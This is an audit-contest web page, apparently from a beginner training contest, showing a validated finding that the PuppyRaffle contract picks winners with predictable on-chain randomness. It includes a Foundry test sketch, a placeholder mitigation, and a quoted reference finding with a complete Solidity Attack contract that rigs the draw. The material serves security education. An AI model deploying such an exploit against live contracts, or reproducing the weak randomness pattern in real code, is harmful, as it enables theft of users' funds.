Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Weak PRNG in `selectWinner()` enables biased winner selection

0xsnoweth

Root + Impact

Description

selectWinner() is intended to fairly select a random winner from players after the raffle duration, pay out the prize pool, and mint an NFT.
The winner index uses keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty)), which is predictable/biasable by the caller and block producer, allowing manipulation of the selected winner.

function selectWinner() external {

require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");

require(players.length >= 4, "PuppyRaffle: Need at least 4 players");

// @> Weak entropy sources (caller + block fields)

uint256 winnerIndex =

uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

address winner = players[winnerIndex];

...

}

Risk

Likelihood:

The caller repeatedly triggers selectWinner() from chosen addresses and at chosen block times on a public chain.
A block producer selects a timestamp/difficulty to favor a desired winnerIndex on blocks where selectWinner() is included.

Impact:

The raffle outcome is biased, enabling unfair prize and NFT distribution.
Users lose expected value and trust in the raffle's fairness.

Proof of Concept

PoC — A test can vary caller and block parameters to influence winnerIndex.

// Foundry-style sketch

function test_biasWinnerIndex() public {

// arrange players ...

vm.warp(block.timestamp + raffleDuration + 1);

// @> Vary caller to vary keccak seed

vm.prank(address(0xBEEF));

raffle.selectWinner();

// On a fork/local chain, also vary block number/params

vm.roll(block.number + 1);

vm.warp(block.timestamp + 1);

vm.prank(address(0xCAFE));

raffle.selectWinner();

// observe different winnerIndex / winner outcomes

}

Recommended Mitigation

Mitigation — Use a secure randomness source (VRF) or a commit-reveal scheme; remove reliance on block.timestamp/block.difficulty and caller address.

function selectWinner() external {

require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");

require(players.length >= 4, "PuppyRaffle: Need at least 4 players");

- uint256 winnerIndex =

- uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

+ // Example stub: winnerIndex should come from a verifiable randomness source

+ // (VRF callback or commit-reveal finalized value).

+ uint256 winnerIndex = _getSecureWinnerIndex(players.length);

address winner = players[winnerIndex];

...

}

+function _getSecureWinnerIndex(uint256 n) internal view returns (uint256) {

+ // TODO: integrate VRF or commit-reveal; placeholder to illustrate intent

+ return 0;

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 2 days ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!